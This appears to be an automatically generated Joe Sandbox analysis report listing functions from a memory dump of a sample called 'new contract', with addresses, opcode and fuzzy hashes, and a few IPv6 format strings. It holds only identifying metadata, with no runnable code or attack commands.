                                                                                                                                                                            • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                                                                                            • Instruction ID: f6e9bdd7ba10a689ab23bf0b4f23373d93f1822ed7c6bc090a5f03c042bd1fc5
                                                                                                                                                                            • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                                                                                            • Instruction Fuzzy Hash: 75D01236100249EFCB02DF41C890D9A7B2BFBD8710F108019FD19076108A31ED62DA50
                                                                                                                                                                            Function 01620750 Relevance: .0, Instructions: 9COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                                                                                            • Instruction ID: 4ad718402088b07d1c68c5da17df28208e58b7615997ce46ff154a33ffa90369
                                                                                                                                                                            • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                                                                                            • Instruction Fuzzy Hash: E6C04C797015418FCF15DB19D794F4577E4F754750F1518D0E805CB721E724E805CA10
                                                                                                                                                                            Function 01664340 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: e172c4c438b62026560107f1a6eac222164adcec0cd607ffd011448312a46f51
                                                                                                                                                                            • Instruction ID: f7f97deef94f908ec4ae79470bc2e782c74a5bc3a3690f3ad69399aa2a9c5aac
                                                                                                                                                                            • Opcode Fuzzy Hash: e172c4c438b62026560107f1a6eac222164adcec0cd607ffd011448312a46f51
                                                                                                                                                                            • Instruction Fuzzy Hash: E790023160580012914075584C885474009A7E0301B55C121E4424654DCA148E565361
                                                                                                                                                                            Function 01664650 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: af830110bb7be53304a420d388521d7c1bdf41d7c9871420fec7eff7d7515d0c
                                                                                                                                                                            • Instruction ID: 8fa1b03d2af62e782b7278729e8f26cf32a47cc7f17137c5ce48a0972b1b01d2
                                                                                                                                                                            • Opcode Fuzzy Hash: af830110bb7be53304a420d388521d7c1bdf41d7c9871420fec7eff7d7515d0c
                                                                                                                                                                            • Instruction Fuzzy Hash: 7790026160150042414075584C084076009A7E1301395C225A4554660DC6188D559369
                                                                                                                                                                            Function 01662BE0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: cc452bf3455871ee68dc3655075af0b004f7b57898154ac9c104b2b6e22eb915
                                                                                                                                                                            • Instruction ID: 3238d8adecb2e293899483f2b882ebbdbe8c29a1b04ed87c5a509cb3dfe011c5
                                                                                                                                                                            • Opcode Fuzzy Hash: cc452bf3455871ee68dc3655075af0b004f7b57898154ac9c104b2b6e22eb915
                                                                                                                                                                            • Instruction Fuzzy Hash: AF90023120544842D14075584808A47001997D0305F55C121A4064794ED6258E55B761
                                                                                                                                                                            Function 01662BA0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 9d3c19a870f5bfc7e3336adbad1f5683318f8e46cc164c1044bdf4d6563cb6bc
                                                                                                                                                                            • Instruction ID: 83f03ab27ceb34e8506a6d8bb7c12b88fda2fa14d41b05bfda64488891129807
                                                                                                                                                                            • Opcode Fuzzy Hash: 9d3c19a870f5bfc7e3336adbad1f5683318f8e46cc164c1044bdf4d6563cb6bc
                                                                                                                                                                            • Instruction Fuzzy Hash: 6990023160540802D15075584818747000997D0301F55C121A4024754EC7558F5577A1
                                                                                                                                                                            Function 01662B80 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: c5b2c55409f5be972b2846da9632008c6a88802b4af4ec50c23641d99da3cc0c
                                                                                                                                                                            • Instruction ID: f740f227d4ccd97c60f894749862203e01d864ac7c840700ab5ac454172667af
                                                                                                                                                                            • Opcode Fuzzy Hash: c5b2c55409f5be972b2846da9632008c6a88802b4af4ec50c23641d99da3cc0c
                                                                                                                                                                            • Instruction Fuzzy Hash: 7290023120140802D10475584C08687000997D0301F55C121AA024755FD6658D917231
                                                                                                                                                                            Function 01662AF0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 0549a3e63423b6006877f54c648af8402c3525380764edd321d08bdd992a0121
                                                                                                                                                                            • Instruction ID: f5e96baa7a7fc60b6beaa8ea9678d25e1f5908b341f11ba2dcf336f4226a8815
                                                                                                                                                                            • Opcode Fuzzy Hash: 0549a3e63423b6006877f54c648af8402c3525380764edd321d08bdd992a0121
                                                                                                                                                                            • Instruction Fuzzy Hash: 2B900225221400020145B9580A0850B0449A7D6351395C125F5416690DC6218D655321
                                                                                                                                                                            Function 01662AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 32e2d9ef0ac5ac6136f8cc178ba8284c5aa593340866f0031cf12e4c15a958d8
                                                                                                                                                                            • Instruction ID: ca783e9f1b678f294d46f28c7d12e69ee4bd81cb892e94d1575bbcda220e1c6e
                                                                                                                                                                            • Opcode Fuzzy Hash: 32e2d9ef0ac5ac6136f8cc178ba8284c5aa593340866f0031cf12e4c15a958d8
                                                                                                                                                                            • Instruction Fuzzy Hash: 9B9002A1201540924500B6588808B0B450997E0201B55C126E5054660DC5258D519235
                                                                                                                                                                            Function 01662D00 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 04adb0fc40d7ea4debdd3fc52cd9a638a810730bdf506a7a3e6fb1631d7ee54b
                                                                                                                                                                            • Instruction ID: 53c5da4b0dd24fee8639edd387089d6d85ded672696ff297731d250f2e19685b
                                                                                                                                                                            • Opcode Fuzzy Hash: 04adb0fc40d7ea4debdd3fc52cd9a638a810730bdf506a7a3e6fb1631d7ee54b
                                                                                                                                                                            • Instruction Fuzzy Hash: 8C90022120544442D1007958580CA07000997D0205F55D121A5064695EC6358D51A231
                                                                                                                                                                            Function 01662DB0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 65f277dfc95fe6dbbe16dc410dd7c36d594d10555f314e01bb168c7f674a8045
                                                                                                                                                                            • Instruction ID: e2cf5fc8dbfcd8cc3df00955539fe7d947e6500ddf59e624cfda916b19763376
                                                                                                                                                                            • Opcode Fuzzy Hash: 65f277dfc95fe6dbbe16dc410dd7c36d594d10555f314e01bb168c7f674a8045
                                                                                                                                                                            • Instruction Fuzzy Hash: 7A90023124140402D14175584808607000DA7D0241F95C122A4424654FC6558F56AB61
                                                                                                                                                                            Function 01662C60 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: fd7135d4b5395fd567ed0d10ca89bfdf709aaf3c15108ead6feacb13967a8a12
                                                                                                                                                                            • Instruction ID: 77a5ef659118583d8e456265b839763a5c3ff70327c21284cabfcb7172037a52
                                                                                                                                                                            • Opcode Fuzzy Hash: fd7135d4b5395fd567ed0d10ca89bfdf709aaf3c15108ead6feacb13967a8a12
                                                                                                                                                                            • Instruction Fuzzy Hash: 0C90023120140842D10075584808B47000997E0301F55C126A4124754EC615CD517621
                                                                                                                                                                            Function 01662CF0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: cf45d9351f5c3628e64ad7f31a27eded5ba6b3e550f91b90e2c4e89c3f6c7bf8
                                                                                                                                                                            • Instruction ID: 60555c2fe0896c56c24f157ef53b400b4ad825e70ea5e3149bbd0bec0a997e0e
                                                                                                                                                                            • Opcode Fuzzy Hash: cf45d9351f5c3628e64ad7f31a27eded5ba6b3e550f91b90e2c4e89c3f6c7bf8
                                                                                                                                                                            • Instruction Fuzzy Hash: 5790023120140403D1007558590C707000997D0201F55D521A4424658ED6568D516221
                                                                                                                                                                            Function 01662CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 6a7295a7f561ce86f22451e8bd7f70f47d78b753ac7a5f9ab22f0125925f83e5
                                                                                                                                                                            • Instruction ID: 5aa5c98cf53d9c2237c685970c384b0e477ef91ea39f485699e92ed05ec17506
                                                                                                                                                                            • Opcode Fuzzy Hash: 6a7295a7f561ce86f22451e8bd7f70f47d78b753ac7a5f9ab22f0125925f83e5
                                                                                                                                                                            • Instruction Fuzzy Hash: D090022160540402D1407558581C707001997D0201F55D121A4024654EC6598F5567A1
                                                                                                                                                                            Function 01662F60 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 39a8b49c6abe5535838ed74d46d1e9d8bfd7923a1e5f72060535e641c0ff0e08
                                                                                                                                                                            • Instruction ID: 117049bc8f1ebba074339039371ddece1dd3cdeb116a06562eb4dcd8cfd00a5b
                                                                                                                                                                            • Opcode Fuzzy Hash: 39a8b49c6abe5535838ed74d46d1e9d8bfd7923a1e5f72060535e641c0ff0e08
                                                                                                                                                                            • Instruction Fuzzy Hash: 8790026121140042D10475584808707004997E1201F55C122A6154654DC5298D615225
                                                                                                                                                                            Function 01662FA0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 196792a3c5c3028075dd2515d74ec65bf2135817d1393ebdbbc2d89cf798ceba
                                                                                                                                                                            • Instruction ID: cde5eee2dde60fb12ba3673562aa9dfe6ad695fb9235b311a3c09cdd6748dea5
                                                                                                                                                                            • Opcode Fuzzy Hash: 196792a3c5c3028075dd2515d74ec65bf2135817d1393ebdbbc2d89cf798ceba
                                                                                                                                                                            • Instruction Fuzzy Hash: 6090023120180402D10075584C0C747000997D0302F55C121A9164655FC665CD916631
                                                                                                                                                                            Function 01662E30 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 251f4b6a821b4dae1bc8e282d41af02f673c7f43223117878e81d7e17721ac02
                                                                                                                                                                            • Instruction ID: 28b4aa8a27c52bdb473f534cc1543feffdf9c8c955c686446f88b64c2fbdf526
                                                                                                                                                                            • Opcode Fuzzy Hash: 251f4b6a821b4dae1bc8e282d41af02f673c7f43223117878e81d7e17721ac02
                                                                                                                                                                            • Instruction Fuzzy Hash: D390022130140402D10275584818607000DD7D1345F95C122E5424655EC6258E53A232
                                                                                                                                                                            Function 01662EE0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: dfb01950cebd3f143f80a51df945819977e51e90c1b4a60cb034144e341048ba
                                                                                                                                                                            • Instruction ID: 2e1ce91a7f488cadfe6d5accc48841c232ef44864bdd3301af7ea65ca856c242
                                                                                                                                                                            • Opcode Fuzzy Hash: dfb01950cebd3f143f80a51df945819977e51e90c1b4a60cb034144e341048ba
                                                                                                                                                                            • Instruction Fuzzy Hash: CB90026120180403D14079584C08607000997D0302F55C121A6064655FCA298D516235
                                                                                                                                                                            Function 01663010 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 0ddb72e3fa5236036507f83a405d4909127a66257fbba038359a560d4d7a7a3d
                                                                                                                                                                            • Instruction ID: 5bf35cadd7e2c6f50c0be09b2cdf374bad197f798c10bb2bd2c0950b371a3ced
                                                                                                                                                                            • Opcode Fuzzy Hash: 0ddb72e3fa5236036507f83a405d4909127a66257fbba038359a560d4d7a7a3d
                                                                                                                                                                            • Instruction Fuzzy Hash: 5190022120184442D14076584C08B0F410997E1202F95C129A8156654DC9158D555721
                                                                                                                                                                            Function 01663090 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 2fc840ba902719ad8d1c07bc546d21e5b59a82cd960bce62bf7da605965aa908
                                                                                                                                                                            • Instruction ID: 645c554d91c7dd2b096e7a8a6f325b0e3d09248151e35dc0ca6f73ba7007cbd5
                                                                                                                                                                            • Opcode Fuzzy Hash: 2fc840ba902719ad8d1c07bc546d21e5b59a82cd960bce62bf7da605965aa908
                                                                                                                                                                            • Instruction Fuzzy Hash: 3290022124140802D14075588818707000AD7D0601F55C121A4024654EC6168E6567B1
                                                                                                                                                                            Function 016635C0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 04ff427de91c0fb5ebcc53651d1404b52c0799689a0536d554b0d86fe7b9cbb2
                                                                                                                                                                            • Instruction ID: adcc88ee3b730a4b697f022d5ec0c7c6909c62dee0de702fd0d024830faa3541
                                                                                                                                                                            • Opcode Fuzzy Hash: 04ff427de91c0fb5ebcc53651d1404b52c0799689a0536d554b0d86fe7b9cbb2
                                                                                                                                                                            • Instruction Fuzzy Hash: 1690023160550402D10075584918707100997D0201F65C521A4424668EC7958E5166A2
                                                                                                                                                                            Function 016639B0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: ac69a2c92f80cb18f022a150538a136a979c63ece78f3e07f05e676db4940835
                                                                                                                                                                            • Instruction ID: 709dd3cde8461db2643c8a009b63afea99958237d777b056589764d5c2370d56
                                                                                                                                                                            • Opcode Fuzzy Hash: ac69a2c92f80cb18f022a150538a136a979c63ece78f3e07f05e676db4940835
                                                                                                                                                                            • Instruction Fuzzy Hash: 7890022124545102D150755C48086174009B7E0201F55C131A4814694EC5558D556321
                                                                                                                                                                            Function 01663D70 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 85bb78430f2524da7fedfbfb4cd7fc4ad20175ac443501e7f92955c2c9e3442e
                                                                                                                                                                            • Instruction ID: 4493e6d715561b4e96ceef525f78d4a5cd6c6e48e7899f31d13cac6eaf019118
                                                                                                                                                                            • Opcode Fuzzy Hash: 85bb78430f2524da7fedfbfb4cd7fc4ad20175ac443501e7f92955c2c9e3442e
                                                                                                                                                                            • Instruction Fuzzy Hash: 7A90023520140402D51075585C08647004A97D0301F55D521A4424658EC6548DA1A221
                                                                                                                                                                            Function 01663D10 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 830741c4cf8d523f6af5ddba51f0b38962d5c3529b4b680c0f014cd8e1397e9b
                                                                                                                                                                            • Instruction ID: e745e012469c149039ed82dc5b28fd8169708aad1bf83794a589d82050dd0faf
                                                                                                                                                                            • Opcode Fuzzy Hash: 830741c4cf8d523f6af5ddba51f0b38962d5c3529b4b680c0f014cd8e1397e9b
                                                                                                                                                                            • Instruction Fuzzy Hash: 8B90023120240142954076585C08A4F410997E1302B95D525A4015654DC9148D615321
                                                                                                                                                                            Function 01662C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                                                            • Instruction ID: 78dfd5bbceb54ca91cd4a2a6c994c42a56b28f6f3cc7643338e06eb382223418
                                                                                                                                                                            • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                                                            • Instruction Fuzzy Hash:
                                                                                                                                                                            Function 01662890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ___swprintf_l
                                                                                                                                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                                            • API String ID: 48624451-2108815105
                                                                                                                                                                            • Opcode ID: 948af4cab237965f37d761f4e84b4512b4044e34852d258e03040aea7b0814be
                                                                                                                                                                            • Instruction ID: ce194fdff84d1b593d1b185d3136e6137ad8f754359c274ef26e8b7cca4ecd4a
                                                                                                                                                                            • Opcode Fuzzy Hash: 948af4cab237965f37d761f4e84b4512b4044e34852d258e03040aea7b0814be
                                                                                                                                                                            • Instruction Fuzzy Hash: 2851C1A6A00116AFDB11DFAD8CA097EFBBCBB48240714C26DE5A5D7641E334DE44CBA0
                                                                                                                                                                            Function 016D2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ___swprintf_l
                                                                                                                                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                                            • API String ID: 48624451-2108815105
                                                                                                                                                                            • Opcode ID: 5592e1dc890cb781fbb9ef2ffa511580059445618b5f1afbd58cf7d94a150669
                                                                                                                                                                            • Instruction ID: b8020b33eb3e15f3bb24b63ce8950c95fa9a03a5598a4e48a96c4c453be463de
                                                                                                                                                                            • Opcode Fuzzy Hash: 5592e1dc890cb781fbb9ef2ffa511580059445618b5f1afbd58cf7d94a150669
                                                                                                                                                                            • Instruction Fuzzy Hash: C651F371E00646AEDB31DF9CCDA097FBBF9EB48200B44846DE996D7741E774EA408760
                                                                                                                                                                            Function 01657630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            • ExecuteOptions, xrefs: 016946A0
